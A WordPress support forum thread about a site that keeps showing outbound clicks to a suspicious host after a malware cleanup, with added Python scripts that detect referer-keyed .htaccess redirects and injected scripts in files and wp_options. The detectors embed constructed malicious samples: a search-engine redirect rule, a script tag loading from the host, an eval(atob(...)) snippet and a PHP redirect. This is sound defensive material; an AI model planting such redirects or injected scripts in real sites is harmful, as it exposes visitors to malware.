• Resolved slywy

    (@slywy)


    For the past couple of weeks, almost daily Wordfence has been alerting me to newly created admin users, altered WordPress files, files that appear to be malware, etc. I’ve used it and Sucuri to clean up files, and removed bad files from the root directory as well. I’ve changed all passwords multiple times, reinstalled WordPress, removed a couple of plugins I can live without, deactivated and reinstalled a couple like Jetpack, and keep an eye on files on the server.

    The only thing that has me flummoxed and I’m not sure what to do about: In stats, Jetpack shows clicks from my site to other sites. Most are legit — to Flickr, other sites I link to. But there’s a URL that keeps showing up: somesite.com/rt4.php?r3=[different random strings of letters, numbers, and hyphens]. I can’t find anything about this or what it means, and the hosting service didn’t know either. Has anyone else seen this and is it anything to worry about?

    • This topic was modified 3 months ago by slywy.
    • This topic was modified 1 month, 2 weeks ago by Jan Dembowski.


Viewing 15 replies - 1 through 15 (of 15 total)
  • Hi there! First off, have you been able to fix the malware issue? One setting that is often involved with new admin accounts being generated is at wp-admin > Settings > General > Membership > Anyone can register. If that is on, and the New User Default Role under it is set to Administrator, that can be a problem.

    As for authmycookie.com/rt4.php?r3=[different random strings of letters, numbers, and hyphens], like you, I couldn’t find a lot of information. Perhaps there’s a theme or plugin accessing that site periodically? Do you know if these clicks were there before the most recent issues with your site?

    Thread Starter slywy

    (@slywy)

    Hi there! First off, have you been able to fix the malware issue? One setting that is often involved with new admin accounts being generated is at wp-admin > Settings > General > Membership > Anyone can register. If that is on, and the New User Default Role under it is set to Administrator, that can be a problem.

    I think I have fixed the malware issue. According to Wordfence and Sucuri, there are no more issues. (Until it happens again.) But I suspect something is lingering somewhere.

    “Anyone can register” is unchecked, and the New User Default Role is Subscriber.

    As for authmycookie.com/rt4.php?r3=[different random strings of letters, numbers, and hyphens], like you, I couldn’t find a lot of information. Perhaps there’s a theme or plugin accessing that site periodically? Do you know if these clicks were there before the most recent issues with your site?

    These “clicks” started to appear after all the malware attacks, which makes me think something is lingering that Wordfence and Sucuri haven’t found or can’t find. I also eliminated files outside WordPress that had appeared. I’m not sure what else to do.

    Glad to hear the malware issue seems to be resolved for now.

    As for the clicks, about the only other thing I can suggest is running a search for “authmycookie” through your server. This wouldn’t be a search in WordPress, but on the file system on your host.

    If nothing shows up, then I think you could wait a while and observe. A click from your site to an external site on its own shouldn’t affect your website. Hopefully it’s just an innocent residue from something, but now harmless.

    Thread Starter slywy

    (@slywy)

    As for the clicks, about the only other thing I can suggest is running a search for “authmycookie” through your server. This wouldn’t be a search in WordPress, but on the file system on your host.

    I found this under logs/slywy.com_443_access_log. I don’t know what it means.

    61.22.214.128 – – [28/Nov/2024:18:46:09 -0700] “GET /?s=authmycookie HTTP/1.1” 200 73214

    Oh, that is a record of me searching for the word “authmycookie” on your website a few hours ago. I used the search bar on your site, just to see if anything would show up. As expected, nothing came up.

    If that is the only thing you found, then I think you can leave this as-is for the moment. Hopefully your site won’t have any more malware issues.

    Thread Starter slywy

    (@slywy)

    Yeah, I can’t think of anything else I can do with so little info available. I don’t want to be passing malware or whatever on to site visitors or inadvertently sending them somewhere that does. I did find this:

    https://radar.cloudflare.com/scan/618138a9-30e2-4c77-9f2d-b2ebba91bdbe/summary

    So I just spent ages combating a fresh infection of some kind, and it seems like I’ve been plucking away at this thing, weeding out crap everywhere. It’s like the second one of these things gets pwned, it just keeps getting worse; some jackass decided it would be smart to turn off updates and not tell anyone. I would suggest checking your .htaccess file; it may have a redirect in there that only happens when you’re referred by known referring agents like Google or Bing. I think the idea is this evades detection by not replacing the contents if you go in directly via your normal domain.
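The referer-keyed .htaccess redirect this reply describes, as an added example written for this page (not code from the thread or from any plugin): a small Python checker that pairs each RewriteCond with the RewriteRule it guards and flags rules that send search-engine referrals to a host you do not own. The sample .htaccess is constructed; the off-site host is the one from the thread, and example.com stands in for the site's own domain.

```python
"""Flag .htaccess rewrite rules that send only search-engine referrals off-site.

Added example for this page, not code from any plugin or from the thread.
The .htaccess text is constructed; the off-site host is the one from the
thread and example.com stands in for the site's own domain.
"""
import re

SEARCH_ENGINES = re.compile(r"google|bing|yahoo|duckduckgo|yandex", re.I)
COND = re.compile(r"^\s*RewriteCond\s+%\{(\w+)\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
ABS_URL = re.compile(r"^https?://([^/\s?]+)", re.I)


def find_conditional_redirects(htaccess_text, own_host):
    """One finding per RewriteRule that redirects to a host other than
    own_host AND is guarded by a RewriteCond on the referer or user agent
    that names a search engine. A visitor typing the URL directly never
    matches such a rule, which is why the owner sees a clean site."""
    own_host = own_host.lower()
    findings = []
    pending = []  # RewriteCond lines that apply to the next RewriteRule
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        m = COND.match(line)
        if m:
            pending.append((m.group(1).upper(), m.group(2)))
            continue
        m = RULE.match(line)
        if m:
            target = m.group(2)
            host = ABS_URL.match(target)
            goes_offsite = host is not None and host.group(1).lower() != own_host
            keyed_on = [var for var, pattern in pending
                        if var in ("HTTP_REFERER", "HTTP_USER_AGENT")
                        and SEARCH_ENGINES.search(pattern)]
            if goes_offsite and keyed_on:
                findings.append({"line": lineno, "target": target,
                                 "keyed_on": keyed_on})
            pending = []
        elif line.strip() and not line.lstrip().startswith("#"):
            pending = []  # any other directive breaks the Cond/Rule chain
    return findings


# Constructed sample: the stock WordPress block followed by an injected
# referer-keyed redirect of the kind described in the reply above.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\\. [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteRule ^(.*)$ http://authmycookie.com/rt4.php?r3=$1 [R=302,L]
"""

if __name__ == "__main__":
    for f in find_conditional_redirects(SAMPLE_HTACCESS, "example.com"):
        print("line %d: %s (keyed on %s)"
              % (f["line"], f["target"], ", ".join(f["keyed_on"])))
```

Run it over every .htaccess in the tree, not only the one in the web root; injected copies in wp-content/uploads are common. An empty result does not clear the site: the same referer check can be done in PHP (`$_SERVER['HTTP_REFERER']`) or in JavaScript stored in the database, which this file-only check will never see.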

    Thread Starter slywy

    (@slywy)

    I would suggest checking your .htaccess file; it may have a redirect in there that only happens when you’re referred by known referring agents like Google or Bing. I think the idea is this evades detection by not replacing the contents if you go in directly via your normal domain.

    Good idea, but when I checked the .htaccess file there was nothing in there that would cause this (there was very little in there). I was hoping that was the answer too.

    Thread Starter slywy

    (@slywy)

    Okay, now I’ve installed and paid for MalCare, which said the site was hacked and reported:

    Script DELETED in Table ‘wp_options’

    I hope that does it . . .
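A combined check for the two places this thread looked, as an added example written for this page (not code from Wordfence, Sucuri or MalCare): the file-system search suggested earlier, and the wp_options table where MalCare finally found the script. It also covers the two registration settings from the first reply. The indicator strings are the ones from the thread; the sample files, the wp_options rows and the own-host set (example.com) are constructed for the demo.

```python
"""Look for the lingering redirect in both places this thread checked:
files on disk and rows in wp_options.

Added example for this page, not code from Wordfence, Sucuri or MalCare.
Assumptions: indicator strings from the thread (authmycookie.com, rt4.php);
sample files and wp_options rows are constructed; example.com stands in for
the site's own host.
"""
import os
import re
import tempfile

INDICATORS = ("authmycookie.com", "rt4.php")

# <script src="//host/..."> or <script src="https://host/..."> -> captures host
EXTERNAL_SCRIPT = re.compile(
    r'<script[^>]+src=["\']?(?:https?:)?//([^/"\'\s>]+)', re.I)
# building blocks of obfuscated inline JavaScript
OBFUSCATED = re.compile(r'\b(?:eval|atob|unescape|String\.fromCharCode)\s*\(', re.I)


def scan_files(root, indicators=INDICATORS):
    """Relative paths of files under root containing any indicator.

    The file-system search from the thread, but case-insensitive and without
    skipping dotfiles such as .htaccess or a dropped '.cache.php'.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", errors="ignore") as fh:
                    text = fh.read().lower()
            except OSError:
                continue
            if any(ind.lower() in text for ind in indicators):
                hits.append(os.path.relpath(full, root).replace(os.sep, "/"))
    return sorted(hits)


def scan_options(rows, own_hosts, indicators=INDICATORS):
    """Check (option_name, option_value) pairs from wp_options.

    Returns (option_name, reason) pairs: the two registration settings from
    the first reply, plus injected scripts that a file search cannot see
    because the payload lives in the database.
    """
    own_hosts = {h.lower() for h in own_hosts}
    findings = []
    for name, value in rows:
        low = value.lower()
        if name == "users_can_register" and value.strip() == "1":
            findings.append((name, "open registration enabled"))
        if name == "default_role" and low.strip() == "administrator":
            findings.append((name, "new users default to administrator"))
        for ind in indicators:
            if ind.lower() in low:
                findings.append((name, "contains indicator " + ind))
                break
        for m in EXTERNAL_SCRIPT.finditer(value):
            host = m.group(1).lower()
            if host not in own_hosts:
                findings.append((name, "loads external script from " + host))
        if OBFUSCATED.search(value):
            findings.append((name, "obfuscated inline script"))
    return findings


# Constructed wp_options rows: clean settings, a theme mod loading the site's
# own script, an injected widget and an injected transient.
SAMPLE_OPTIONS = [
    ("siteurl", "https://example.com"),
    ("users_can_register", "0"),
    ("default_role", "subscriber"),
    ("theme_mods_twentytwenty",
     'a:1:{s:4:"head";s:48:"<script src="https://example.com/a.js"></script>";}'),
    ("widget_custom_html",
     'a:1:{i:2;a:1:{s:7:"content";s:59:"<script src="//authmycookie.com/rt4.php?r3=ab-12"></script>";}}'),
    ("_transient_doing_cron_x", 'eval(atob("Li4u"))'),
]


def demo_file_scan():
    """Build a throw-away fake webroot (constructed files) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        files = {
            "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
            ".htaccess": "RewriteEngine On\nRewriteRule . /index.php [L]\n",
            "wp-content/uploads/.cache.php":
                "<?php header('Location: https://AuthMyCookie.com/rt4.php?r3=' . uniqid());\n",
        }
        for rel, body in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return scan_files(root)


if __name__ == "__main__":
    print(demo_file_scan())
    for name, reason in scan_options(SAMPLE_OPTIONS, {"example.com"}):
        print(name, "->", reason)
```

To feed real data into scan_options, export the table with `wp option list --format=csv` or `SELECT option_name, option_value FROM wp_options` and pass the rows in. The same script check is worth running over post_content in wp_posts, which is the other common place injected JavaScript ends up and which neither a file search nor an .htaccess review will show.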

    Thread Starter slywy

    (@slywy)

    I have not seen any clicks to the auth my cookie site today for the first time in a couple of weeks at least. Removal of the script may have done it. (I can’t tell what the script is intended to do. It’s a foreign language to me.)

    Thread Starter slywy

    (@slywy)

    MalCare seems to have taken care of this so am marking “resolved.”

    @slywy Do you have any other details on what MalCare did? I’m facing your exact same issue. What plugin? What option stored the script? etc.

    Thread Starter slywy

    (@slywy)

    @slywy Do you have any other details on what MalCare did? I’m facing your exact same issue. What plugin? What option stored the script? etc.

    It said: Script DELETED in Table ‘wp_options’

    I have the script itself but not sure it’s a good idea to post it?

    @slywy
    The website is blacklisted, so you may need to work on getting it removed from the blocklists. Thank you
    https://www.virustotal.com/gui/url/11e807919d33eca7c2435c4147aeee3b6ecead591ef18032caf502aaeb529426

    Thread Starter slywy

    (@slywy)

    @moeo I’m not sure what I could do to get it removed. It doesn’t appear to be affected on, say, Google or Bing.

  • The topic ‘After removing malware, clicks to “somesite.com/[string]”’ is closed to new replies.